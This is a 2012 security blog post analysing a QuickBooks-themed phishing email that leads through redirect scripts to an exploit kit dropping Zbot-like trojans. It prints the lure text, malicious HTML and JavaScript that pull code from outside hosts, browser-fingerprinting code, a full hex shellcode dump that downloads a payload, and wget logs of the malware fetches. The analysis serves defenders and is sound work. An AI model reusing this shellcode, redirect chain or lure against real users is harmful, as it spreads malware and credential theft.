Saturday, September 1, 2012

What can Exploit Kit do & drop? Full story of spam to malwares

I am following the steps of infection of ONE spam mail which lead to a sophisticated exploit kit which dropped MANY malwares, during infection it was automatically detecting your browser and PC to find the best mess to drop/infect you beforehand. 
The dropped malwares collection is at below pic:

↑ As you can see all is in the today's date, is fresh. Don't worry the sample is out there, grab them all.
This threat is so nasty so I think I need to blog it. Below is the report. 

I believe some of you received or seeing mail like this:

Date:      Tue, 28 Aug 2012 11:04:30 -0400
From:      "Intuit Payroll Services" 
Subject:      QuickBooks Security Update

You will not be able to access your Intuit QuickBooks 
without updated Intuit Security Tool (IST™) after 31th of August, 2012.

You can update Intuit Security Tool here.

After a successful download please run the setup for an automatic 
installation, then login to Intuit Quickbooks online to check that 
it is working properly.

This email was sent from an auto-notification system that 
can't accept incoming email. Please don't reply to this message.

You have received this business communication as part of our efforts to fulfill 
your request or service your account.
You may receive this and other business communications from us 
even if you have opted out of marketing messages.

Terms, conditions, pricing, features, and service options are 
subject to change. View our complete Terms of Service.


If you click the term and condition you will access the below link:

hxxp://babyu.onedaynet.co.kr/JHF0X3B/index.html


After accessing the url you will get the malicious index.html like below:

<html>
<h1>WAIT PLEASE</h1>
 <h3>Loading...</h3>
 <script type="text/javascript" 
          src="hXXp://66.242.140.34/LA5S92vH/js.js"></script>
<script type="text/javascript" 
          src="hXXp://freerobinfly.com/sS5N3rtK/js.js"></script>
<script type="text/javascript" src="
          hXXp://ftp.santoscortereal.com.br/wBWnt3vJ/js.js"></script>

</html>

↑It is a not-good index.html, let's check in VirusTotal :

MD5:       5d323254ee15f460a6bd6f7262cd3c42
File size:       327 バイト ( 327 bytes )
File name:       output.2145601.txt
File type:       HTML
Tags:            html
Detection ratio: 18 / 42
Analysis date:   2012-08-31 12:47:34 UTC 
URL:             [CLICK]


If you trace the three urls written in that HTML,
it will lead you to the same javascript file. I traced it like this:

--00:27:31--  hXXp://66.242.140.34/LA5S92vH/js.js
           => `js.js'
Connecting to 66.242.140.34:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 78 [application/x-javascript]
100%[====================================>] 78            --.--K/s
00:27:32 (2.72 MB/s) - `js.js' saved [78/78]

--00:27:40--  hXXp://freerobinfly.com/sS5N3rtK/js.js
           => `js.js.1'
Resolving freerobinfly.com... 74.208.242.135
Connecting to freerobinfly.com|74.208.242.135|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 78 [application/x-javascript]
100%[====================================>] 78            --.--K/s
00:27:41 (371.47 KB/s) - `js.js.1' saved [78/78]

--00:27:47--  hXXp://ftp.santoscortereal.com.br/wBWnt3vJ/js.js
           => `js.js.2'
Resolving ftp.santoscortereal.com.br... 200.98.197.17
Connecting to ftp.santoscortereal.com.br|200.98.197.17|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 78 [application/x-javascript]
100%[====================================>] 78            --.--K/s
00:27:48 (1.92 MB/s) - `js.js.2' saved [78/78]


Let's see what's inside of this js.js

document・location='hXXp://50.116.44.177/pxyk80ujzb03h.php?y=078eb263358008ea';

↑Another redirection. OK. This is no good too, let7s check in Virus Total again:

MD5:              e2525763bdf95e9a33001fd231ee109e
File size:        78 バイト ( 78 bytes )
File name:        js.js
File type:        Text
Detection ratio:  3 / 42
Analysis date:    2012-08-31 15:59:42 UTC ( 0 分 ago ) 
URL:              [CLICK]

↑OK, at least three antivirus product is detected it.

Let's grab it too and see the inside of it then ↓

--00:29:18--  http://50.116.44.177/pxyk80ujzb03h.php?y=078eb263358008ea
           => `pxyk80ujzb03h.php@y=078eb263358008ea'
Connecting to 50.116.44.177:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
    [   <=>                               ] 69,236       115.00K/s
00:29:20 (114.70 KB/s) - `pxyk80ujzb03h.php@y=078eb263358008ea' saved [69236]


And the inside is obfuscation code like this 

↑This is definitely not good at all, let's check it in Virus Total first↓

MD5:             643e431692f6ce0eaf4bb4bdb1e0ed4a
File size:       67.6 KB ( 69236 bytes )
File name:       pxyk80ujzb03h.php@y=078eb263358008ea
File type:       HTML
Detection ratio: 2 / 42
Analysis date:   2012-08-31 16:18:34 UTC ( 0 分 ago ) 
URL:             [CLICK]

Oh, looks like I am the first who uploaded this sample.
Well at least NOW at least we still have 2 antivirus product detected it.

If you deobfuscated it right you will have below result, 
one is the below code:

document・write('<center>Waiting for redirect...</center>');
function end_redirect(){
  window・location.href = 'hxxp://davidkellett.co.uk/updateflashplayer.exe';


And the other is a plugin detect in Javascript:

 var PluginDetect = {
    version : "0.7.8", name : "PluginDetect", handler : function (c, b, a){
      return function (){
        c(b, a) <etc etc>。。。。。


It detected your OS:

c.OS = 100;
if (b){
  var d = ["Win", 1, "Mac", 2, "Linux", 3, "FreeBSD", 4, "iPhone", 21.1, "iPod", 
  21.2, "iPad", 21.3, "Win.*CE", 22.1, "Win.*Mobile", 22.2, "Pocket\\s*PC", 22.3, ""
  , 100];
  for (f = d.length - 2; f >= 0; f = f - 2){
    if (d[f] && new RegExp(d[f], "i").test(b)){
      c.OS = d[f + 1];
      break 


It sensing your browser user agent for the right drops:

var c = this , a = navigator, e = "/", f, i = a.userAgent || "", g = a.vendor || "", 
 b = a.platform || "", h = a.product || "";
 c.initObj(c, ["$", c]);
 for (fin c.Plugins){
   if (c.Plugins[f]){
     c.initObj(c.Plugins[f], ["$", c, "$$", c.Plugins[f]], 1)
   }


Sensing the element to install messes to your browser:

c.head = (document.getElementsByTagName("head")[0] || document.getElementsByTagName(
"body")[0] || document.body || null);
c.isIE = (new Function("return " + e + "*@cc_on!@*" + e + "false"))();
c.verIE = c.isIE && (/MSIE\s*(\d+\.?\d*)/i).test(i) ? parseFloat(RegExp.$1, 10) : 
null      ;
c.ActiveXEnabled = false;
if (c.isIE){
  var f, j = ["Msxml2.XMLHTTP", "Msxml2.DOMDocument", "Microsoft.XMLDOM", 
  "ShockwaveFlash.ShockwaveFlash", "TDCCtl.TDCCtl", "Shell.UIHelper", 
  "Scripting.Dictionary", "wmplayer.ocx"];
  for (f = 0; f < j.length; f ++ ){
    if (c.getAXO(j[f])){
      c.ActiveXEnabled = true;
      break 


And Checking which browser you have

c.isGecko = (/Gecko/i).test(h) && (/Gecko\s*\/\s*\d/i).test(i);
c.verGecko = c.isGecko ? c.formatNum((/rv\s*\:\s*([\.\,\d]+)/i).test(i) ? RegExp.$1 : 
"0.9") : null;
c.isChrome = (/Chrome\s*\/\s*(\d[\d\.]*)/i).test(i);
c.verChrome = c.isChrome ? c.formatNum(RegExp.$1) : null;
c.isSafari = ((/Apple/i).test(g) || (!g &&! c.isChrome)) && (
/Safari\s*\/\s*(\d[\d\.]*)/i).test(i);
c.verSafari = c.isSafari && (/Version\s*\/\s*(\d[\d\.]*)/i).test(i) ? c.formatNum(
RegExp.$1) : null;
c.isOpera = (/Opera\s*[\/]?\s*(\d+\.?\d*)/i).test(i);
c.verOpera = c.isOpera && ((/Version\s*\/\s*(\d+\.?\d*)/i).test(i) || 1) ? 


Very interesting to know that this code is considering to use Java against you:

DTK : {
 $ : 1, hasRun : 0, status : null, VERSIONS : [], version : "", HTML : null, 
 Plugin2Status : null, classID : ["clsid:CAFEEFAC-DEC7-0000-0001-ABCDEFFEDCBA", 
 "clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA"], mimeType : [
 "application/java-deployment-toolkit", 
 "application/npruntime-scriptable-plugin;DeploymentToolkit"], disabled : 
 function (){
   :
   :
   :
 var m, s = "1,4,2,0", g = "JavaPlugin." + a[0] + "" + a[1] + "" + a[2] + "" + 
(a[3] > 0 ? ("_" + (a[3] < 10 ? "0" : "") + a[3]) : "");
for (h = 0; h < f.JavaVersions.length; h ++ ){
  d = f.JavaVersions[h];
  n = "JavaPlugin." + d[0] + "" + d[1];
  b = d[0] + "." + d[1] + ".";
  for (l = d[2];
  l >= 0; l -- ){
    r = "JavaWebStart.isInstalled." + b + l + ".0";
    if (e.compareNums(d[0] + "," + d[1] + "," + l + ",0", j) >= 0 &&! e.getAXO


Well, is sphisticated isn't it? The full code of deobfs are here ====>>> [CLICK]

OK, let's get further. The deobfs code above also brings you the shellcode below:


41 41 41 41 66 83 e4 fc  fc eb 10 58 31 c9 66 81 
e9 57 fe 80 30 28 40 e2  fa eb 05 e8 eb ff ff ff 
ad cc 5d 1c c1 77 1b e8  4c a3 68 18 a3 68 24 a3 
58 34 7e a3 5e 20 1b f3  4e a3 76 14 2b 5c 1b 04 
a9 c6 3d 38 d7 d7 90 a3  68 18 eb 6e 11 2e 5d d3 
af 1c 0c ad cc 5d 79 c1  c3 64 79 7e a3 5d 14 a3 
5c 1d 50 2b dd 7e a3 5e  08 2b dd 1b e1 61 69 d4 
85 2b ed 1b f3 27 96 38  10 da 5c 20 e9 e3 25 2b 
f2 68 c3 d9 13 37 5d ce  76 a3 76 0c 2b f5 4e a3 
24 63 a5 6e c4 d7 7c 0c  24 a3 f0 2b f5 a3 2c a3 
2b ed 83 76 71 eb c3 7b  85 a3 40 08 a8 55 24 1b 
5c 2b be c3 db a3 40 20  a3 df 42 2d 71 c0 b0 d7 
d7 d7 ca d1 c0 28 28 28  28 70 78 42 68 40 d7 28 
28 28 78 ab e8 31 78 7d  a3 c4 a3 76 38 ab eb 2d 
d7 cb 40 47 46 28 28 40  5d 5a 44 45 7c d7 3e ab 
ec 20 a3 c0 c0 49 d7 d7  d7 c3 2a c3 5a a9 c4 2c 
29 28 28 a5 74 0c 24 ef  2c 0c 5a 4d 4f 5b ef 6c 
0c 2c 5e 5a 1b 1a ef 6c  0c 20 08 05 5b 08 7b 40 
d0 28 28 28 d7 7e 24 a3  c0 1b e1 79 ef 6c 35 28 
5f 58 4a 5c ef 6c 35 2d  06 4c 44 44 ee 6c 35 21 
28 71 a2 e9 2c 18 a0 6c  35 2c 69 79 42 28 42 28 
7b 7f 42 28 d7 7e 3c ad  e8 5d 3e 42 28 7b d7 7e 
2c 42 28 ab c3 24 7b d7  7e 2c ab eb 24 c3 2a c3 
3b 6f a8 17 28 5d d2 6f  a8 17 28 5d ec 42 28 42 
d6 d7 7e 20 c0 b4 d6 d7  d7 a6 66 26 c4 b0 d6 a2 
26 a1 47 29 95 1b e2 a2  73 33 ee 6e 51 1e 32 07 
58 40 5c 5c 58 12 07 07  1d 18 06 19 19 1e 06 1c 
1c 06 19 1f 1f 07 58 06  58 40 58 17 4e 15 18 19 
1c 18 18 0e 4d 15 19 28  28 00 


This will lead you to the downloading file from:

hxxp://50.116.44.177/p.php?f=01400&e=1


So we have two new download URL that we can assumed is payload, let's check,
The first URL is:

--00:34:48--  hxxp://davidkellett.co.uk/updateflashplayer.exe
           => `updateflashplayer.exe'
Resolving davidkellett.co.uk... 209.235.144.9
Connecting to davidkellett.co.uk|209.235.144.9|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 371,112 (362K) [application/x-msdownload]
100%[====================================>] 371,112       72.82K/s    ETA 00:00
00:34:55 (52.38 KB/s) - `updateflashplayer.exe' saved [371112/371112]


In virus Total the score is 11/42:

MD5:            4c22e00d38a44b810f6103ec6837b137
File size:      362.4 KB ( 371112 bytes )
File name:      updateflashplayer.exe
File type:      Win32 EXE
Tags:          peexe
Detection ratio:11 / 42
Analysis date:  2012-08-31 15:29:23 UTC ( 7 分 ago ) 
URL:            [CLICK]

↑It looks like Zbot. I am not expert w/ naming buff, 
Anyway malware details I wrote in Virus Total Page..

The other drops goes to:

--00:36:20--  http://50.116.44.177/p.php?f=01400
           => `p.php@f=01400'
Connecting to 50.116.44.177:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 177,576 (173K) [application/x-msdownload]
100%[===================================> ] 177,576      147.57K/s
00:36:22 (147.13 KB/s) - `p.php@f=01400' saved [177576/177576]


This is also a bad stuff, in Virus Total only 1(one) vendor detected it.

MD5:  096a79434392461517907c6f62b27cd1
File size:      173.4 KB ( 177576 bytes )
File name:      sample
File type:      Win32 EXE
Tags:          peexe
Detection ratio:1 / 42
Analysis date:  2012-08-31 15:37:57 UTC ( 1 時間, 23 分 ago ) 
URL:            [URL]

↑Is a Trojan, runs as daemon/processes, reads keyboard & screen, 
worse of all is faking Microsoft binary with the yesterday compilation day.
Posted by unixfreaxjp at